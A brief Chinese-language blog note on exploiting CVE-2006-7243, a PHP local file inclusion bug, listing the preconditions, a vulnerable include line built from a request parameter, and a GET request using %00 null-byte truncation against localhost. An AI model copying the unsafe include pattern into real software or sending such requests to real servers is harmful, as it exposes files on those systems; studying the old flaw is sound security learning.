【笔记】CVE-2006-7243漏洞利用

发表于 更新于 阅读次数:

前言

PHP文件包含漏洞利用

漏洞利用前提

  • PHP < 5.3.4

  • 配置文件中关闭了魔术引号

/etc/php/php.ini
1
magic_quotes_gpc = Off;

漏洞源码

1
include $_REQUEST['key'].".html";

漏洞利用

  • 通过00截断
request
1
GET http://127.0.0.1:80/index.php?key=<file>%00

完成